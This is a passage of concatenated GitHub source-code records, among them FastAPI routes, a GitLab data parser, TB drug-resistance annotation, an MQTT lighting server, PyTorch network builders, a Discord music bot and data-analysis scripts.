get_all_products(size: int = 0):\n if size == 0:\n return data\n else:\n return data[:size]\n\n\n\n@router.get(\"/{product_id}\")\nasync def get_all_products(product_id: str):\n for x in data:\n print(x['id'])\n if x['id'] == str(product_id):\n return x\n return str(\"The product you were looking for with id \"+ product_id + \" was not in our system\")\n\n\n@router.post(\"/create\")\nasync def create_some_product(my_product: Product):\n data.append(my_product)\n return data\n","repo_name":"ashishkjay/cms-manager-api","sub_path":"v1/routes/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8622943139","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Time : 2020/10/8 11:22\n# @Author : NJU\n# @Version:V 0.1\n# @File : Discussions.py\n# @desc :\n\nfrom source.data.bean.Beanbase import BeanBase\nfrom source.data.bean.Notes import Notes\nfrom source.utils.StringKeyUtils import StringKeyUtils\n\n\nclass Discussions(BeanBase):\n \"\"\"记录 Gitlab 的 discussions 对象\n \"\"\"\n\n def __init__(self):\n self.id = None\n self.notes = None # List\n\n self.change_trigger_system = None # 用于标识系统判定的更改\n self.analysisNodesList = None # 分析时候用的 notes 的暂时存储\n\n @staticmethod\n def getIdentifyKeys():\n \"\"\"提供对象所有要放数据库的主键\"\"\"\n return [StringKeyUtils.STR_KEY_ID]\n\n @staticmethod\n def getItemKeyList():\n \"\"\"提供对象所有要放数据库的数据项\"\"\"\n return [StringKeyUtils.STR_KEY_ID]\n\n @staticmethod\n def getItemKeyListWithType():\n items = [(StringKeyUtils.STR_KEY_ID, BeanBase.DATA_TYPE_STRING)]\n return items\n\n def getValueDict(self):\n items = {StringKeyUtils.STR_KEY_ID: self.id}\n return items\n\n class parser(BeanBase.parser):\n\n @staticmethod\n def parser(src):\n res = Discussions()\n if isinstance(src, dict):\n res.id = src.get(StringKeyUtils.STR_KEY_ID, None)\n notes = src.get(StringKeyUtils.STR_KEY_NOTES, None)\n if notes is not None and isinstance(notes, list):\n note_list = []\n for note in notes:\n if note is not None:\n note_list.append(Notes.parser.parser(note))\n res.notes = note_list\n\n return 
res\n\n class parserV4(BeanBase.parser):\n\n @staticmethod\n def parser(src):\n res = Discussions()\n if isinstance(src, dict):\n res.id = src.get(StringKeyUtils.STR_KEY_ID, None)\n notes = src.get(StringKeyUtils.STR_KEY_NOTES, None)\n if notes is not None and isinstance(notes, dict):\n notesData = notes.get(StringKeyUtils.STR_KEY_NODES, None)\n if isinstance(notesData, list):\n note_list = []\n for note in notesData:\n if note is not None:\n note_list.append(Notes.parserV4.parser(note))\n res.notes = note_list\n\n return res\n","repo_name":"soilerl/HuaweiProject","sub_path":"source/data/bean/Discussions.py","file_name":"Discussions.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39263638220","text":"import pathogenprofiler as pp\nimport requests\nimport re\n\n\ndef aa_long2short(mut):\n aconv = {\n \"Ala\":\"A\",\"Arg\":\"R\",\"Asn\":\"N\",\"Asp\":\"D\",\"Cys\":\"C\",\n \"Gln\":\"Q\",\"Glu\":\"E\",\"Gly\":\"G\",\"His\":\"H\",\"Ile\":\"I\",\n \"Leu\":\"L\",\"Lys\":\"K\",\"Met\":\"M\",\"Phe\":\"F\",\"Pro\":\"P\",\n \"Ser\":\"S\",\"Thr\":\"T\",\"Trp\":\"W\",\"Tyr\":\"Y\",\"Val\":\"V\",\n \"Stop\":\"*\", \"-\":\"-\",\"*\":\"*\"\n }\n r = re.search(\"p.([A-Z][a-z][a-z])([0-9]+)([A-Za-z\\*]+)\",mut)\n return f\"{aconv[r.group(1)]}{r.group(2)}{aconv[r.group(3)]}\"\n\ndef get_biosig_pza_prediction(raw_change):\n change = aa_long2short(raw_change)\n g = requests.get(f\"http://biosig.unimelb.edu.au/suspect_pza/api/prediction_single?mutation={change}\")\n data = g.json()\n data[\"prediction\"] = data[\"suspect_pza_prediction\"]\n return data\n\ndef get_biosig_bdq_prediction(raw_change):\n change = aa_long2short(raw_change)\n g = requests.get(f\"http://biosig.unimelb.edu.au/suspect_bdq/api/prediction_single?mutation={change}\")\n data = g.json()\n data[\"prediction\"] = data[\"suspect_bdq_prediction\"]\n return data\n\ndef suspect_profiling(results):\n new_vars = []\n for var in results[\"other_variants\"]:\n if var[\"type\"]!=\"missense_variant\": continue\n pred = None\n if var[\"gene\"]==\"atpE\":\n pp.logging.info(f\"Profiling {var['gene']} {var['change']} with suspect-bdq\")\n pred = get_biosig_bdq_prediction(var[\"change\"])\n if var[\"gene\"]==\"pncA\":\n pp.logging.info(f\"Profiling {var['gene']} {var['change']} with suspect-pza\")\n pred = get_biosig_pza_prediction(var[\"change\"])\n if pred:\n if \"annotation\" in var:\n var[\"annotation\"].append(pred)\n else:\n var[\"annotation\"] = [pred]\n if pred[\"prediction\"]==\"Resistant\":\n var[\"drugs\"] = [{\n \"type\":\"drug\",\n \"drug\":\"pyrazinamide\" if var[\"gene\"]==\"pncA\" else \"bedaquiline\",\n \"confers\": \"resistance\",\n \"evidence\": \"suspect-PZA\" if var[\"gene\"]==\"pncA\" else \"suspect-BDQ\"\n }]\n new_vars.append(var)\n for v in new_vars:\n results[\"dr_variants\"].append(v)\n results[\"other_variants\"].remove(v)\n return results","repo_name":"jodyphelan/TBProfiler","sub_path":"tbprofiler/xdb.py","file_name":"xdb.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"16"} +{"seq_id":"26614219882","text":"import paho.mqtt.publish as publish\nimport paho.mqtt.client as mqtt\nimport time\nfrom server_helpers import *\nfrom lighting_helpers import *\nMQTT_SERVER = \"192.168.43.130\"\n#port = 1883\nsend_path = \"topic/serene\"\nlisten_path = \"topic/init_loc\"\nrec_client_strings = {}\nMIN_CLIENTS = 1\ncycle = 0\n\ndef 
on_publish(client,userdata,result):\n\tprint(\"LED sequence sent\")\n\tpass\n\ndef on_connect(client, userdata, flags, rc):\n\tprint(\"Connected: result code \" + str(rc))\n\tclient.subscribe(listen_path)\n\ndef on_message(client, userdata, msg):\n byte_statement = msg.payload\n statement = byte_statement.decode(\"utf-8\")\n print(msg.topic + \" \" + str(statement))\n if \"DIED\" in statement:\n dead_client = statement[:-4]\n if dead_client in rec_client_strings:\n del rec_client_strings[dead_client]\n else:\n split_string = statement.split(\";\")\n # Map statement to client ID. This overwrites any previous statements from same client.\n rec_client_strings[split_string[4]]=statement\n \n time.sleep(2)\n\ndef assign_lighting(grid, cycle, num_clients):\n msg = \"\"\n if num_clients == 1:\n msg = steady_on(grid, cycle)\n #print(\"steady_on\")\n elif (num_clients == 2):\n msg = flash_slow(grid, cycle)\n #print(\"flash_slow\")\n elif num_clients == 3:\n #msg = flash_fast(grid, cycle)\n #print(\"flash_fast\")\n print('three connected')\n msg = three_connected_colors(grid,cycle, \"b\", \"d\")\n # msg = three_connected_basic(grid,cycle)\n elif num_clients == 4:\n msg = UCLA_light_scheme(grid, cycle)\n #print(\"UCLA_light_scheme\")\n return msg\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_publish = on_publish\nclient.connect(MQTT_SERVER, 1883, 60)\n#client.loop_forever()\nclient.loop_start()\nwhile True:\n time.sleep(2)\n if len(rec_client_strings) >= MIN_CLIENTS:\n client_data = parse_from_strings_hash(rec_client_strings)\n print(client_data)\n grid, _ = localize_all(client_data)\n light_asgns = assign_lighting(grid, cycle, len(client_data))\n print(\"THIS IS THE LIGHT ASSIGNMENT\")\n print(light_asgns)\n client.publish(send_path, light_asgns)\n cycle += 1\n","repo_name":"auszhang/ECE180D-Project","sub_path":"Fall/MQTT_Code/server_hash.py","file_name":"server_hash.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36636920376","text":"from PIL import Image\n\nn_imagem = input(\"Digite o numero da imagem: \")\nim = \"../BancoImagem/imagem\" + n_imagem + \".png\"\nimagem = Image.open(im)\ntamanho = imagem.size\n\ntudo = []\nfor x in range(tamanho[0]):\n for y in range(tamanho[1]):\n pixel = imagem.getpixel((x,y))\n \n if pixel != (255,255,255,255):\n tudo.append((x,y))\n\n#Procura por pixels em uma area 3X3 tendo o pixel informado como centro\ndef achar_pixel(referencia,direcao,lista,imagem):\n area = []\n for x in range(referencia[0]-1,referencia[0]+2):\n for y in range(referencia[1]-1,referencia[1]+2):\n pixel = imagem.getpixel((x,y))\n\n if pixel != (255,255,255,255):\n if (x,y) not in lista:\n area.append((x,y))\n if len(area) != 0:\n for ponto in area:\n if ponto[0] - referencia[0] == direcao[0] and ponto[1] - referencia[1] == direcao[1]:\n return (ponto,direcao)\n\n return (area[0], (area[0][0]-referencia[0],area[0][1]-referencia[1]))\n\n return None\n\n#Acha o primeiro pixel com a cor informada\ndef achar_inicio(imagem,tamanho,cor=(0,0,0,255)):\n for x in range(tamanho[0]):\n for y in range(tamanho[1]):\n pixel = imagem.getpixel((x,y))\n \n if pixel == cor:\n return (x,y)\n \n\ninicio = achar_inicio(imagem,tamanho,(255,0,0,255))\nreferencia = inicio\ndirecao = (0,0)\nlista = [inicio]\nexe = True\n\nwhile exe:\n\n resultado = achar_pixel(referencia,direcao,lista,imagem)\n if resultado is None:\n exe = False\n try:\n referencia = 
resultado[0]\n direcao = resultado[1]\n lista.append(referencia)\n except:\n exe = False\n\nprint(len(lista))\nprint(len(tudo))\n\ncont = 1\nfor x in tudo:\n if x not in lista:\n print(str(cont) + \" \" + str(x))\n cont += 1\n\n\nprogress = input(\"Digite 0 para parar. Para prosseguir, pressione qualquer tecla. --> \")\nif progress == \"0\":\n exit(0)\n\n\n\n# Pegar pontos faltantes e adicionar na lista de coordenadas\narea = []\nfor referencia in lista:\n for x in range(referencia[0]-1,referencia[0]+2):\n for y in range(referencia[1]-1,referencia[1]+2):\n pixel = imagem.getpixel((x,y))\n\n if pixel != (255,255,255,255):\n if (x,y) not in lista and (x,y) not in area:\n area.append((x,y))\n index = lista.index(referencia)\n lista.insert(index+1,(x,y))\n\nprint()\nprint(len(lista))\nprint(len(tudo), end=\"\\n\")\nfor i in area:\n print(i, end=\" / \")\nprint()\n\n# Checar se os pontos foram adicionandos no local correto\n\nfor i in lista:\n print(i)\n\n#Calcular diferença entre ponto_x e ponto_x+1 --- passar para o interpretador --- passar para o drone\ndiferenca = []\nfor x in range(len(lista)):\n if x+1 == len(lista):\n break\n else:\n ele1 = lista[x]\n ele2 = lista[x+1]\n dif = (ele1[0]-ele2[0],ele1[1]-ele2[1])\n diferenca.append(dif)\n\nprint(diferenca)","repo_name":"Lima001/Tecnico-IFC","sub_path":"PI-III/Testes/Teste 02/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39263331560","text":"\nimport discord\nfrom discord.ext import commands\nimport youtube_dl\n\nclass music(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command()\n async def join(self, ctx):\n if ctx.author.voice is None:\n await ctx.send('Подключись к каналу')\n voice_channel = ctx.author.voice.channel\n if ctx.voice_client is None:\n await voice_channel.connect()\n else:\n await ctx.voice_client.move_to(voice_channel)\n\n @commands.command()\n async def disconnect(self, ctx):\n await ctx.voice_client.disconnect()\n\n @commands.command()\n async def play(self, ctx, url):\n destination = ctx.author.voice.channel\n await destination.connect()\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\n voice = ctx.voice_client\n YDL_OPTIONS = {'format': \"bestaudio\"}\n\n\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(url, download=False)\n url2 = info['formats'][0]['url']\n voice.play(discord.FFmpegPCMAudio(executable = 'ffmpeg.exe', source=url2, **FFMPEG_OPTIONS))\n\n\ndef setup(client):\n client.add_cog(music(client))","repo_name":"KatoonGeka/musicDiscordBot","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5567815802","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.modules.activation import ReLU\n\n\nstr_to_initializer = {\n 'uniform': nn.init.uniform_,\n 'normal': nn.init.normal_,\n 'eye': nn.init.eye_,\n 'xavier_uniform': nn.init.xavier_uniform_,\n 'xavier': nn.init.xavier_uniform_,\n 'xavier_normal': nn.init.xavier_normal_,\n 'kaiming_uniform': nn.init.kaiming_uniform_,\n 'kaiming': nn.init.kaiming_uniform_,\n 'kaiming_normal': nn.init.kaiming_normal_,\n 'he': nn.init.kaiming_normal_,\n 'orthogonal': nn.init.orthogonal_\n }\n\n\nstr_to_activation = {\n 'elu': nn.ELU(),\n 'hardshrink': nn.Hardshrink(),\n 
'hardtanh': nn.Hardtanh(),\n 'leakyrelu': nn.LeakyReLU(),\n 'logsigmoid': nn.LogSigmoid(),\n 'prelu': nn.PReLU(),\n 'relu': nn.ReLU(),\n 'relu6': nn.ReLU6(),\n 'rrelu': nn.RReLU(),\n 'selu': nn.SELU(),\n 'sigmoid': nn.Sigmoid(),\n 'softplus': nn.Softplus(),\n 'logsoftmax': nn.LogSoftmax(),\n 'softshrink': nn.Softshrink(),\n 'softsign': nn.Softsign(),\n 'tanh': nn.Tanh(),\n 'tanhshrink': nn.Tanhshrink(),\n 'softmin': nn.Softmin(),\n 'softmax': nn.Softmax(dim=1),\n 'none': None\n }\n\n\ndef initialize_weights(initializer):\n def initialize(m):\n if isinstance(m, nn.Linear) or isinstance(m, nn.Conv2d):\n initializer(m.weight)\n if m.bias is not None:\n torch.nn.init.constant_(m.bias, 0)\n return initialize\n\n\ndef create_linear_network(input_dim, output_dim, hidden_units=[],\n hidden_activation='relu', output_activation=None,\n initializer='xavier_uniform'):\n model = []\n units = input_dim\n for next_units in hidden_units:\n model.append(nn.Linear(units, next_units))\n model.append(str_to_activation[hidden_activation])\n units = next_units\n\n model.append(nn.Linear(units, output_dim))\n if output_activation is not None:\n model.append(str_to_activation[output_activation])\n\n return nn.Sequential(*model).apply(\n initialize_weights(str_to_initializer[initializer]))\n\n\ndef create_dqn_base(num_channels, initializer='xavier_uniform'):\n return nn.Sequential(\n nn.Conv2d(num_channels, 32, kernel_size=8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(),\n Flatten(),\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\n#自作SAC用\ndef create_dq_network1(num_channels, input_actions , output_dim, hidden_units, initializer = 'xavier_unifrom', ):\n return nn.Sequential(\n # 画像サイズの変化84*84→20*20\n nn.Conv2d(num_channels , 32, kernel_size=8, stride=4),\n # stackするflameは4画像なのでinput_dim=4である、出力は32とする、\n # sizeの計算 size = (Input_size - Kernel_size + 2*Padding_size)/ Stride_size + 1\n nn.ReLU(),\n # 画像サイズの変化20*20→9*9\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1), # 画像サイズの変化9*9→7*7\n nn.ReLU(),\n nn.Flatten(), # 画像形式を1次元に変換\n nn.Linear(64 * 7 * 7, 16), # 64枚の7×7の画像を、256次元のoutputへ\n nn.ReLU(),\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\ndef create_dq_network2(num_channels, input_actions , output_dim, hidden_units, initializer = 'xavier_unifrom', ):\n return nn.Sequential(\n nn.Linear(16 + input_actions ,128),\n nn.ReLU(),\n nn.Linear(128,128),\n nn.ReLU(),\n nn.Linear(128, output_dim)\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\ndef create_policy_network(input_dim, output_dim, hidden_units, initializer = 'xavier_unifrom', ):\n return nn.Sequential(\n # 画像サイズの変化84*84→20*20\n nn.Conv2d(input_dim, 32, kernel_size=8, stride=4),\n # stackするflameは4画像なのでinput_dim=4である、出力は32とする、\n # sizeの計算 size = (Input_size - Kernel_size + 2*Padding_size)/ Stride_size + 1\n nn.ReLU(),\n # 画像サイズの変化20*20→9*9\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1), # 画像サイズの変化9*9→7*7\n nn.ReLU(),\n nn.Flatten(), # 画像形式を1次元に変換\n nn.Linear(64 * 7 * 7, 256), # 64枚の7×7の画像を、256次元のoutputへ\n nn.ReLU(),\n nn.Linear(256,128),\n nn.ReLU(),\n nn.Linear(128,128),\n nn.ReLU(),\n nn.Linear(128, output_dim)\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\n\n\ndef conv_net(env, in_dim, hidden, depth, act_layer):\n # this assumes image shape == (1, 28, 
28)\n act_layer = getattr(nn, act_layer)\n n_acts = env.action_space.n\n conv_modules = [\n nn.Conv2d(1, 10, kernel_size=5, stride=2),\n nn.Conv2d(10, 20, kernel_size=5, stride=2),\n nn.Flatten(),\n ]\n fc_modules = []\n fc_modules.append(nn.Linear(320 + in_dim, hidden))\n for _ in range(depth - 1):\n fc_modules += [act_layer(), nn.Linear(hidden, hidden)]\n fc_modules.append(act_layer())\n conv_modules = nn.Sequential(*conv_modules)\n fc_modules = nn.Sequential(*fc_modules)\n return fc_modules, conv_modules\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n","repo_name":"KDR121/OP3-using-Soft-Actor-Critic","sub_path":"rltorch/network/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9441507360","text":"import copy\n\nn=int(input())\ncount=0\nlst=[[0]*26 for i in range(n)]\nfor i in range(0,n):\n ch = input()\n for j in ch:\n lst[i][ord(j)-65]=lst[i][ord(j)-65]+1\n\nfor i in range(1,n):\n if lst[0]==lst[i]:\n count=count+1\n elif abs(sum(lst[0])-sum(lst[i]))==1:\n check=0\n for j in range(26):\n if lst[0][j] != lst[i][j]:\n check=check+1\n if check==1:\n count=count+1\n elif sum(lst[0])==sum(lst[i]):\n check=0\n for j in range(26):\n if lst[0][j] != lst[i][j]:\n check=check+1\n if check==2:\n count=count+1\n\nprint(count)","repo_name":"ymin96/ACM-ICPC","sub_path":"others/2607.py","file_name":"2607.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36349319210","text":"#! /usr/bin/env python\n\"\"\"\n 生成一只小乌龟\n 准备工作:\n 1.服务话题 /spawn\n 2.服务消息类型 turtlesim/Spawn\n 3.运行前先启动 turtlesim_node 节点\n\n 实现流程:\n 1.导包\n 需要包含 turtlesim 包下资源,注意在 package.xml 配置\n 2.初始化 ros 节点\n 3.创建 service 客户端\n 4.等待服务启动\n 5.发送请求\n 6.处理响应\n\n\"\"\"\n\nimport rospy\nimport sys\nfrom turtlesim.srv import Spawn,SpawnRequest,SpawnResponse\n\nif __name__ == \"__main__\":\n # 2.初始化 ros 节点\n rospy.init_node(\"set_turtle_p\")\n # 3.创建 service 客户端\n client = rospy.ServiceProxy(\"/spawn\",Spawn)\n # 4.等待服务启动\n client.wait_for_service()\n # 5.发送请求\n req = SpawnRequest()\n req.x = 2.0\n req.y = 2.0\n req.theta = -1.57\n req.name = \"my_turtle_p\"\n try:\n response = client.call(req)\n # 6.处理响应\n rospy.loginfo(\"乌龟创建成功!,叫:%s\",response.name)\n except Exception as identifier:\n rospy.loginfo(\"服务调用失败\")\n","repo_name":"Divenire1998/ToolsTutorial","sub_path":"ROS/ROS1/AutolaborCourseCode/ch2_communication1/src/my_turtle_test/scripts/demo03_server_p.py","file_name":"demo03_server_p.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12250833070","text":"\nfrom return_statistics import histogram, boxplot, return_statistics\nimport collections\n\ndef checkEqual1(iterator):\n\t#returns true if all elements of iterator are the same\n\t#this will stop producing a histogram of an array with equal values \n iterator = iter(iterator)\n try:\n first = next(iterator)\n except StopIteration:\n return True\n return all(first == rest for rest in iterator)\n\n\ndef OPGEE_input_sensitivity(OPGEE_data, well_data):\n\n\tprint('\\n~~~~~~~~~~~~~~~ OPGEE SENSITIVITY ~~~~~~~~~~~~~~~\\n')\n\n\tOPGEE_array = collections.OrderedDict()\n\tOPGEE_array_wells = collections.OrderedDict()\n\n\tproj_name = OPGEE_data['assessed field'][OPGEE_data['headings'].index('Field name')]\n\n\tfor i in 
range(0,len(OPGEE_data['headings'])):\n\t\tOPGEE_array[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'] = []\n\t\tOPGEE_array_wells[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'] = []\n\n\n\tfor well in OPGEE_data:\n\t\tif well in well_data:\n\t\t\tfor i in range(0,len(OPGEE_data[well])):\n\t\t\t\ttry:\n\t\t\t\t\tdata = float(OPGEE_data[well][i]) # ensure they are numbers\n\t\t\t\t\tround_average_data = round(float(OPGEE_data['assessed field'][i]),3) # need this for C1 composition\n\t\t\t\t\tif data not in [float(0), float(OPGEE_data['assessed field'][i]), float(OPGEE_data['defaults'][i]), round_average_data]:\n\t\t\t\t\t\t#print(OPGEE_data['headings'][i])\n\t\t\t\t\t\t#print(str(OPGEE_data[well][i]) + ' ' + str(OPGEE_data['assessed field'][i]) + ' ' + str(OPGEE_data['defaults'][i]))\n\t\t\t\t\t\tOPGEE_array[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'].append(data) \n\t\t\t\t\t\tOPGEE_array_wells[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'].append(well)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\n\tfor heading in OPGEE_array:\n\t\tarray = OPGEE_array[heading]\n\t\tif len(array) > 0:\n\t\t\tif isinstance(array[0], (int, float)):\n\t\t\t\treturn_statistics(array, heading)\n\t\t\t\thistogram(array, heading)\n\n\n\treturn\n\n\nif __name__ == '__main__':\n\n\tfrom get_well_data import get_formation_well_data\n\tfrom OPGEE_defaults import OPGEE_defaults\n\tfrom search_production_data import search_production_data\n\timport collections\n\tfrom well_search import well_search\n\tfrom general_well_data_analysis import OPGEE_well_data, general_well_data_analysis\n\tfrom production_analysis import production_dates, production_summary, OPGEE_production_data, production_analysis\n\tfrom get_all_post_2005_well_data import get_tight_oil_wells\n\n\tprint('Importing General Well Data') #MONTN1EY\n\t#well_data_function = get_formation_well_data() # MONTNEY\n\t#well_data_function = well_search()\n\twell_data_function = get_tight_oil_wells()\n\n\twell_data_headings = well_data_function[0] # MONTNEY\n\twell_data = well_data_function[1] # MONTNEY\n\tfield_name = 'Montney'\n\n\tOPGEE_data = OPGEE_defaults()\n\n\tOPGEE_data = general_well_data_analysis(well_data_headings, well_data, OPGEE_data, field_name)\n\n\tOPGEE_data = OPGEE_well_data(well_data, well_data_headings, OPGEE_data)\n\n\tproduction_data_headings, production_data, production_well_data, production_well_data_headings = search_production_data(well_data)\n\n\tOPGEE_data = production_analysis(well_data, well_data_headings, production_data, production_data_headings, OPGEE_data)\n\n\tOPGEE_input_sensitivity(OPGEE_data, well_data)\n\n","repo_name":"parissamj/COEA","sub_path":"runfiles-2018/OPGEE_input_sensitivity.py","file_name":"OPGEE_input_sensitivity.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40871585718","text":"import os\nimport traceback\n\nimport xlrd\nimport logging\n\nlongitude_col = 1\nlatitude_col = 2\naltitude_col = 3\nindex_col = 4\nname_eng_col = 6\nformula_col = 8\nprovider_col = 9\n\n\ndef handle_float(number):\n try:\n float_num = float(number)\n return float_num\n except ValueError:\n try:\n new_float_num = float(number.replace(',', '.'))\n return new_float_num\n except ValueError:\n logging.error(\"Incorrect value in excel file\")\n logging.error(traceback.format_exc())\n raise 
Exception('There is xlsx not numerical value in excel file')\n\n\ndef get_xlsfile_data(filename):\n wb = xlrd.open_workbook(filename)\n sheet = wb.sheet_by_index(0)\n rows_amount = sheet.nrows\n providers = {}\n provider_data = {}\n provider = ''\n for i in range(2, rows_amount):\n row = sheet.row_values(i)\n if row[0] != '':\n provider = row[provider_col]\n index = row[index_col]\n try:\n longitude = handle_float(row[longitude_col])\n latitude = handle_float(row[latitude_col])\n altitude = handle_float(row[altitude_col])\n formula = handle_float(row[formula_col])\n except ValueError:\n logging.error(f\"Problem happened in {i} row of your excel file\")\n name_eng = row[name_eng_col]\n provider_data[index] = {\"longitude\": longitude, \"latitude\": latitude,\n \"altitude\": altitude, \"name_eng\": name_eng, \"formula\": formula}\n elif row[0] == '' and len(provider_data) != 0:\n providers[provider] = provider_data\n provider_data = {}\n if i == rows_amount - 1:\n providers[provider] = provider_data\n return providers\n","repo_name":"vovapasko/TextParser2","sub_path":"tools/excel_tools.py","file_name":"excel_tools.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7290271415","text":"def services_restarted(name, exclude_services_globs=None, exclude_paths=None):\n exclude_services_globs = exclude_services_globs or []\n exclude_paths = exclude_paths or []\n\n test = __opts__[\"test\"]\n ret = dict(name=name, result=False, changes={}, comment=\"\")\n r = __salt__[\"maint.restart_services\"](\n test=test,\n exclude_services_globs=exclude_services_globs,\n exclude_paths=exclude_paths,\n )\n kernel = __salt__[\"maint.get_kernel_reboot_required\"]()\n xen = __salt__[\"maint.get_xen_reboot_required\"]()\n comment = [\"needs-restart report:\\n\" + r[\"report\"]]\n if r[\"failed\"]:\n comment.append(\n \"Failed services:\\n%s\"\n % \"\\n\".join([\"- %s: %s\" % (k, v) for k, v in r[\"failed\"].items()])\n )\n else:\n ret[\"result\"] = True\n if r[\"restarted\"]:\n ret[\"changes\"] = {\"restarted\": r[\"restarted\"]}\n if test:\n ret[\"result\"] = None\n comment.append(\n \"Restarted services:\\n%s\" % \"\\n\".join([\"- %s\" % k for k in r[\"restarted\"]])\n )\n if r[\"nonrestartable\"]:\n comment.append(\n \"Nonrestartable services:\\n%s\"\n % \"\\n\".join([\"- %s\" % k for k in r[\"nonrestartable\"]])\n )\n if kernel:\n comment.append(kernel)\n if xen:\n comment.append(xen)\n ret[\"comment\"] = \"\\n\\n\".join(comment) if comment else None\n return ret\n","repo_name":"Rudd-O/saltstack-automation","sub_path":"extmods/states/maint.py","file_name":"maint.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"74991729928","text":"def main():\n image_types = [\"gif\", \"jpg\", \"jpeg\", \"png\"]\n application_types = [\"pdf\", \"zip\"]\n\n file_name = input(\"File name: \").lower().strip()\n file_ext = file_name.split(\".\")[-1] \n\n if file_ext in image_types:\n if file_ext in [\"jpg\", \"jpeg\"]:\n print(\"image/jpeg\")\n else:\n print(\"image/\", file_ext, sep=\"\")\n\n elif file_ext in application_types:\n print(\"application/\", file_ext, sep=\"\")\n elif file_ext == \"txt\":\n print(\"text/plain\")\n else:\n 
print(\"application/octet-stream\")\n\nmain()","repo_name":"josephbak/cs50-python","sub_path":"problems/problem1/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70626832008","text":"import pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt \nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nimport scipy.stats as stats \nimport seaborn as sns\n\nprint ('reading data file...')\ndata = pd.read_csv('nesarc_pds.csv', low_memory=False)\ndata.columns = map(str.upper, data.columns)\n\n# bug fix for display formats to avoid run time errors - put after code for loading data above\npd.set_option('display.float_format', lambda x:'%f'%x)\npd.set_option('display.max_rows', None)\n# Current drinkers(CONSUMER - DRINKING STATUS ) Either 1 (yes) or 2(no) to (S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA)\ndrinkerstemp=data[(data['CONSUMER'] ==1) & ((data['S7Q31A']=='1') | (data['S7Q31A']=='2'))]\n\n#Binary variables are all of the form (1 -yes,2 - no,9 -unkown,NA) - this fixes them\nmapper = ({1:1,2:0})\n\n#Get rid of everything unneeded \ndrinkers = drinkerstemp[['AGE','SEX','S7Q31A','S2AQ8B','S2AQ8C',\n'S2AQ10','S2BQ1A2','S2BQ1A4','S2BQ1A7', 'S2BQ1A8','S2BQ3B', \n'S7Q1','S7Q2','S7Q3','S7Q4A1','S7Q4A2','S7Q4A3','S7Q4A4','S7Q4A5','S7Q4A6','S7Q4A7','S7Q4A8','S7Q4A9',\n'S7Q4A10','S7Q4A11','S7Q4A12','S7Q4A13','S7Q4B','S7Q5','S7Q6']].copy()\n\ndel drinkerstemp \ndel data\n\nfor col in drinkers: # Convert columns to numeric and replace 99's and nulls\n drinkers[col] = pd.to_numeric(drinkers[col],errors='coerce')\n drinkers[col]=drinkers[col].replace(99 ,np.nan).fillna(np.nan)\n\nfor col in ['S2BQ1A2','S2BQ1A4','S2BQ1A7']: # Set missing values to Nan\n drinkers[col]=drinkers[col].replace(9 